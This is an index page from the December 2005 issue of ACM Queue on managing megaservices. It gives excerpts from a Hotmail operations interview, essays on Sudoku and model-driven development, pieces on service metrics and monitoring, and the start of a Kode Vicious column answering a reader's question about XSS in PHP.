Managing Megaservices

Vol. 3 No. 10 – December 2005

Managing Megaservices

Interviews

A Conversation with Phil Smoot

In the landscape of today’s megaservices, Hotmail just might be Mount Everest. One of the oldest free Web e-mail services, Hotmail relies on more than 10,000 servers spread around the globe to process billions of e-mail transactions per day. What’s interesting is that despite this enormous amount of traffic, Hotmail relies on less than 100 system administrators to manage it all.

A Conversation with Phil Smoot

The challenges of managing a megaservice

In the landscape of today’s megaservices, Hotmail just might be Mount Everest. One of the oldest free Web e-mail services, Hotmail relies on more than 10,000 servers spread around the globe to process billions of e-mail transactions per day. What’s interesting is that despite this enormous amount of traffic, Hotmail relies on less than 100 system administrators to manage it all.

To understand how they do it, and to learn more about what it takes to manage such an enormous service, we invited Hotmail engineer Phil Smoot to speak with us. Smoot has been with Microsoft for 11 years and is a product unit manager in Microsoft’s MSN division. He manages the product development teams in Silicon Valley that are responsible for the Hotmail-MSN Communication platform, which includes storage, e-mail delivery, spam prevention, protocol services, directory services, and data warehousing. Prior to Hotmail, Smoot worked with a variety of groups at Microsoft including the Visual Basic team, Microsoft Research, WebTV, and Microsoft Sales and Consulting. His academic background is in physics and computer sciences.

Curmudgeon

Anything Su Doku, I Can Do Better

I dedicate this essay in memoriam to Jef Raskin (March 9, 1943 - February 26, 2005.) Many more authoritative tributes than I can muster continue to pour in, and no doubt a glorious Festschrift will be forthcoming from those who admired this remarkable polymath. “Le don de vivre a passé dans les fleurs.”

Anything Su Doku, I Can Do Better

The new puzzle craze from japan is sweeping the world, and testing our Boolean logic.

Stan Kelly-Bootle, Author

I dedicate this essay in memoriam to Jef Raskin (March 9, 1943 - February 26, 2005.) Many more authoritative tributes than I can muster continue to pour in, and no doubt a glorious Festschrift will be forthcoming from those who admired this remarkable polymath. “Le don de vivre a passé dans les fleurs.”

By a quirk of fate that Jef would have loved, IBM announced the death of OS/2 during the week he died. Or rather, it released what PC World called “an official roadmap to the demise of OS/2.” One imagines a GPS intoning, “Hang a left, then straight for six months. Watch out for road-bumps. Stop at the Stop sign. Your journey is over. Abandon your vehicle. Thanks for your custom and patience.”

by Stan Kelly-Bootle

Articles

Coding for the Code

Despite the considerable effort invested by industry and academia in modeling standards such as UML (Unified Modeling Language), software modeling has long played a subordinate role in commercial software development. Although modeling is generally perceived as state of the art and thus as something that ought to be done, its appreciation seems to pale along with the progression from the early, more conceptual phases of a software project to those where the actual handcrafting is done. As a matter of fact, while models have been found useful for documentation purposes and as rough sketches of implementations, their ultimate value has been severely limited by their ambiguity and tendency to get out of sync with the final code.

Coding for the Code

Can models provide the DNA for software development?

FRIEDRICH STEIMANN, FERNUNIVERSITÄT IN HAGEN, AND THOMAS KÜHNE, DARMSTADT UNIVERSITY OF TECHNOLOGY

Despite the considerable effort invested by industry and academia in modeling standards such as UML (Unified Modeling Language), software modeling has long played a subordinate role in commercial software development. Although modeling is generally perceived as state of the art and thus as something that ought to be done, its appreciation seems to pale along with the progression from the early, more conceptual phases of a software project to those where the actual handcrafting is done. As a matter of fact, while models have been found useful for documentation purposes and as rough sketches of implementations, their ultimate value has been severely limited by their ambiguity and tendency to get out of sync with the final code.

More recently, hopes that modeling might reach its deserved place in the software engineering process have been refueled by so-called MDD (model-driven development) initiatives, most prominently advanced by IBM and the OMG (Object Management Group).1 The underlying idea is to promote models to the primary artifacts of software development, making executable code a pure derivative. According to this development paradigm, software is generated—with the aid of suitable transformations—from a compact description (the model) that is more easily read and maintained by humans than any other form of software specification in use today. Using a metaphor from biology, such a model would be the construction plan—the DNA—of software, and the transformations the ribosomes of the construction process.

by Friedrich Steimann, Thomas Kühne

Lessons from the Floor

The January monthly service quality meeting started normally—around the table were representatives from development, operations, marketing, and product management, and the agenda focused on the prior month’s performance. As usual, customer-impacting incidents and quality of service were key topics, and I was armed with the numbers showing the average uptime for the part of the service that I represent: MSN, the Microsoft family of services that includes e-mail, Instant Messenger, news, weather and sports, etc.

Lessons from the Floor

The manufacturing industry can teach us a lot about measuring performance in large-scale Internet services.

DANIEL ROGERS, MICROSOFT

The January monthly service quality meeting started normally—around the table were representatives from development, operations, marketing, and product management, and the agenda focused on the prior month’s performance. As usual, customer-impacting incidents and quality of service were key topics, and I was armed with the numbers showing the average uptime for the part of the service that I represent: MSN, the Microsoft family of services that includes e-mail, Instant Messenger, news, weather and sports, etc.

Running a service of this size, with thousands of servers behind the scenes, makes it hard to boil performance down to simple averages. Managing a service that provides news, weather, stock quotes, instant messaging, blogs, and hundreds of millions of e-mail accounts by aggregating uptime percentages has proven to be less than effective because a lot of detail is hidden behind the numbers. The customer service calls we handled during the month represented just over .004 percent (that’s right, four one-thousandths of a percent) of the overall service provided—so is it a problem or not?

by Daniel Rogers

Monitoring, at Your Service

Internet services are becoming more and more a part of our daily lives. We derive value from them, depend on them, and are now beginning to assume their ubiquity as we do the phone system and electricity grid. The implementation of Internet services, though, is an unsolved problem, and Internet services remain far from fulfilling their potential in our world.

Monitoring, at Your Service

Automated monitoring can increase the reliability and scalability of today’s online software services.

BILL HOFFMAN, MICROSOFT

Internet services are becoming more and more a part of our daily lives. We derive value from them, depend on them, and are now beginning to assume their ubiquity as we do the phone system and electricity grid. The implementation of Internet services, though, is an unsolved problem, and Internet services remain far from fulfilling their potential in our world.

Internet services are implemented as large, distributed computer systems. Large computer systems require human operators. Hardware fails, software fails, facilities require management. Humans act as the white blood cells that keep the systems working. Humans diagnose problems. Humans replace broken hardware. Humans remove damaged nodes from systems. Humans tune systems to the changing demands of large user bases, optimizing as new features are added and new access patterns emerge. Humans respond to external abuse of services.

by Bill Hoffman

Kode Vicious

Vicious XSS

Dear KV, I know you usually spend all your time deep in the bowels of systems with C and C++ (at least that's what I gather from reading your columns), but I was wondering if you could help me with a problem in a language a little further removed from low-level bits and bytes, PHP. Most of the systems where I work are written in PHP, and, as I bet you've already worked out, those systems are Web sites. My most recent project is a merchant site that will also support user comments. Users will be able to submit reviews of products and merchants to the site. One of the things that our QA team keeps complaining about is possible XSS attacks. Our testers seem to have a special ability to find these, so I wanted to ask you about this. First, why is XSS such a big deal to them; second, how can I avoid having such bugs in my code; and finally, why is cross-site scripting abbreviated XSS instead of CSS?

Vicious XSS

For readers who doubt the relevance of KV’s advice, witness the XSS (cross-site scripting) attack that befell the social networking site MySpace.com in October (http://www.betanews.com/article/CrossSite_Scripting_Worm_Hits_MySpace/1129232391). This month Kode Vicious addresses just this sort of XSS attack. And in response to the reader’s question below, it’s a good thing cross-site scripting is not abbreviated CSS, as the MySpace hacker used CSS (cascading style sheets) to perpetrate his XSS attack. That would have made for one confusing story, eh? Read on for KV’s take on this XSS madness.

Dear KV,
I know you usually spend all your time deep in the bowels of systems with C and C++ (at least that’s what I gather from reading your columns), but I was wondering if you could help me with a problem in a language a little further removed from low-level bits and bytes, PHP. Most of the systems where I work are written in PHP, and, as I bet you’ve already worked out, those systems are Web sites. My most recent project is a merchant site that will also support user comments. Users will be able to submit reviews of products and merchants to the site. One of the things that our QA team keeps complaining about is possible XSS attacks. Our testers seem to have a special ability to find these, so I wanted to ask you about this. First, why is XSS such a big deal to them; second, how can I avoid having such bugs in my code; and finally, why is cross-site scripting abbreviated XSS instead of CSS?
Cross with Scripted Sites

Dear CSS,
First, let’s get something straight: I may spend a lot of time with C and C++, but I object to the use of the word bowels in this context. My job is bad enough without having this image of literally working in the bowels of anything.

by George Neville-Neil